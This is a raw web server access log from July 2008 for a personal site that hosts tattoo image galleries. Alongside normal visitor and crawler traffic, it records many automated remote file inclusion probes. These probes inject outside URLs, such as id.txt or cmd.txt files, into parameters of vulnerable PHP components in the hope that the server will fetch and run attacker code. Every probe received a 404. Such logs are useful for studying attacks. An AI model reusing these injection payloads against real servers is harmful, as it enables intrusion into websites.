71.226.199.84 - - [13/Jul/2008:00:38:23 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:35 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:36 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:36 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
209.216.249.151 - - [13/Jul/2008:00:38:36 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
209.216.249.151 - - [13/Jul/2008:00:38:37 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
71.226.199.84 - - [13/Jul/2008:00:38:37 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:40 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:42 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
66.201.40.66 - - [13/Jul/2008:00:38:44 -0500] "GET /logs//include/write.php?dir=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
66.201.40.66 - - [13/Jul/2008:00:38:44 -0500] "GET //include/write.php?dir=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
71.226.199.84 - - [13/Jul/2008:00:38:44 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:46 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:51 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:52 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:38:56 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:04 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:04 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:04 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:07 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:08 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:09 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:10 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:12 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:14 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:17 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.226.199.84 - - [13/Jul/2008:00:39:21 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
67.18.182.194 - - [13/Jul/2008:00:40:37 -0500] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
67.18.182.194 - - [13/Jul/2008:00:40:38 -0500] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
81.9.63.18 - - [13/Jul/2008:00:41:54 -0500] "GET //include/write.php?dir=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
81.9.63.18 - - [13/Jul/2008:00:41:54 -0500] "GET /logs//include/write.php?dir=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
74.6.18.252 - - [13/Jul/2008:00:44:46 -0500] "GET /logs/access_log.1155945600 HTTP/1.0" 200 153268 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.18.182.194 - - [13/Jul/2008:00:45:56 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
67.18.182.194 - - [13/Jul/2008:00:45:56 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
65.55.208.119 - - [13/Jul/2008:00:48:41 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.214.28.190 - - [13/Jul/2008:00:55:33 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.botolo.altervista.org/idbot5.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
85.214.28.190 - - [13/Jul/2008:00:55:33 -0500] "GET //appserv/main.php?appserv_root=http://www.botolo.altervista.org/idbot5.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
85.214.28.190 - - [13/Jul/2008:00:55:34 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.botolo.altervista.org/idbot5.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
87.106.101.24 - - [13/Jul/2008:01:00:05 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.106.101.24 - - [13/Jul/2008:01:00:11 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.106.18.76 - - [13/Jul/2008:01:08:55 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.106.18.76 - - [13/Jul/2008:01:09:01 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.106.18.76 - - [13/Jul/2008:01:09:01 -0500] "GET //Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
87.106.18.76 - - [13/Jul/2008:01:09:06 -0500] "GET //Neos_Chronos/header.php?base_folder=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
66.201.40.66 - - [13/Jul/2008:01:12:03 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
66.201.40.66 - - [13/Jul/2008:01:12:03 -0500] "GET //ashnews.php?pathtoashnews=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
66.201.40.66 - - [13/Jul/2008:01:12:51 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
66.201.40.66 - - [13/Jul/2008:01:12:51 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
81.9.63.18 - - [13/Jul/2008:01:14:13 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
81.9.63.18 - - [13/Jul/2008:01:14:13 -0500] "GET //ashnews.php?pathtoashnews=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
62.58.108.190 - - [13/Jul/2008:01:18:50 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
62.58.108.190 - - [13/Jul/2008:01:18:50 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
81.29.77.32 - - [13/Jul/2008:01:19:47 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
81.29.77.32 - - [13/Jul/2008:01:19:47 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
81.9.63.18 - - [13/Jul/2008:01:20:16 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 365 "-""libwww-perl/5.811"
81.9.63.18 - - [13/Jul/2008:01:20:16 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 360 "-""libwww-perl/5.811"
212.34.140.215 - - [13/Jul/2008:01:20:34 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
212.34.140.215 - - [13/Jul/2008:01:20:34 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
200.126.108.198 - - [13/Jul/2008:01:21:52 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
200.126.108.198 - - [13/Jul/2008:01:21:52 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
216.146.70.18 - - [13/Jul/2008:01:25:12 -0500] "GET /logs/access_log.1207785600//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.76"
216.146.70.18 - - [13/Jul/2008:01:25:12 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
216.146.70.18 - - [13/Jul/2008:01:25:12 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
212.175.105.8 - - [13/Jul/2008:01:25:46 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
212.175.105.8 - - [13/Jul/2008:01:25:47 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
212.175.105.8 - - [13/Jul/2008:01:26:13 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
212.175.105.8 - - [13/Jul/2008:01:26:14 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
216.193.201.57 - - [13/Jul/2008:01:27:40 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.75"
216.193.201.57 - - [13/Jul/2008:01:27:40 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.75"
205.234.163.201 - - [13/Jul/2008:01:28:04 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
205.234.163.201 - - [13/Jul/2008:01:28:04 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
194.30.128.45 - - [13/Jul/2008:01:28:16 -0500] "GET //skin/zero_vote/error.php?dir=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
194.30.128.45 - - [13/Jul/2008:01:28:17 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
65.55.208.124 - - [13/Jul/2008:01:28:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
116.125.113.115 - - [13/Jul/2008:01:28:30 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
65.55.208.124 - - [13/Jul/2008:01:28:30 -0500] "GET /logs/access_log.1165708800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
116.125.113.115 - - [13/Jul/2008:01:28:31 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
116.125.113.115 - - [13/Jul/2008:01:28:47 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
116.125.113.115 - - [13/Jul/2008:01:28:48 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
81.9.63.18 - - [13/Jul/2008:01:29:00 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
81.9.63.18 - - [13/Jul/2008:01:29:00 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
62.58.108.190 - - [13/Jul/2008:01:32:28 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.58.108.190 - - [13/Jul/2008:01:32:29 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
66.11.230.1 - - [13/Jul/2008:01:35:52 -0500] "GET //xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://web246.webgo24-server11.de/Homepage/fightus/rfi-response.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
66.11.230.1 - - [13/Jul/2008:01:35:52 -0500] "GET /logs//xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://web246.webgo24-server11.de/Homepage/fightus/rfi-response.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
78.111.80.230 - - [13/Jul/2008:01:38:31 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
78.111.80.230 - - [13/Jul/2008:01:38:31 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
78.111.80.230 - - [13/Jul/2008:01:38:31 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
78.111.80.230 - - [13/Jul/2008:01:38:31 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
212.34.140.215 - - [13/Jul/2008:01:38:44 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
212.34.140.215 - - [13/Jul/2008:01:38:44 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
212.227.65.79 - - [13/Jul/2008:01:39:48 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
212.227.65.79 - - [13/Jul/2008:01:39:48 -0500] "GET //appserv/main.php?appserv_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
212.227.65.79 - - [13/Jul/2008:01:39:49 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
89.218.85.18 - - [13/Jul/2008:01:40:39 -0500] "GET /logs/errors.php?error=http://geocities.com/jempiak/header.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.218.85.18 - - [13/Jul/2008:01:40:40 -0500] "GET /errors.php?error=http://geocities.com/jempiak/header.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.6.18.252 - - [13/Jul/2008:01:42:31 -0500] "GET /logs/access_log.1173571200 HTTP/1.0" 200 219925 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
84.19.188.13 - - [13/Jul/2008:01:43:15 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.zivilcourage-neumarkt.de/modules/r0x.gif?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
84.19.188.13 - - [13/Jul/2008:01:43:16 -0500] "GET //appserv/main.php?appserv_root=http://www.zivilcourage-neumarkt.de/modules/r0x.gif?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
84.19.188.13 - - [13/Jul/2008:01:43:16 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.zivilcourage-neumarkt.de/modules/r0x.gif?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
116.125.113.115 - - [13/Jul/2008:01:43:24 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
116.125.113.115 - - [13/Jul/2008:01:43:25 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
116.125.113.115 - - [13/Jul/2008:01:43:25 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
116.125.113.115 - - [13/Jul/2008:01:43:25 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
72.232.71.106 - - [13/Jul/2008:01:43:40 -0500] "GET /logs//include/write.php?dir=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
72.232.71.106 - - [13/Jul/2008:01:43:40 -0500] "GET //include/write.php?dir=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
200.126.108.198 - - [13/Jul/2008:01:44:15 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
200.126.108.198 - - [13/Jul/2008:01:44:16 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
217.151.102.50 - - [13/Jul/2008:01:45:48 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
217.151.102.50 - - [13/Jul/2008:01:45:48 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
212.175.105.8 - - [13/Jul/2008:01:46:17 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.175.105.8 - - [13/Jul/2008:01:46:17 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.175.105.8 - - [13/Jul/2008:01:46:17 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
212.175.105.8 - - [13/Jul/2008:01:46:17 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
81.29.77.32 - - [13/Jul/2008:01:46:43 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
81.29.77.32 - - [13/Jul/2008:01:46:44 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.76"
216.246.91.250 - - [13/Jul/2008:01:47:19 -0500] "GET //include/write.php?dir=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
216.246.91.250 - - [13/Jul/2008:01:47:21 -0500] "GET /logs//include/write.php?dir=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
65.55.209.1 - - [13/Jul/2008:01:47:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.1 - - [13/Jul/2008:01:47:29 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.52.139.226 - - [13/Jul/2008:01:48:22 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
74.52.139.226 - - [13/Jul/2008:01:48:22 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
65.55.109.215 - - [13/Jul/2008:01:49:06 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://www.ringsworld.com/history/5.html""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
70.87.92.250 - - [13/Jul/2008:01:52:25 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.brazebo.it/echo.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
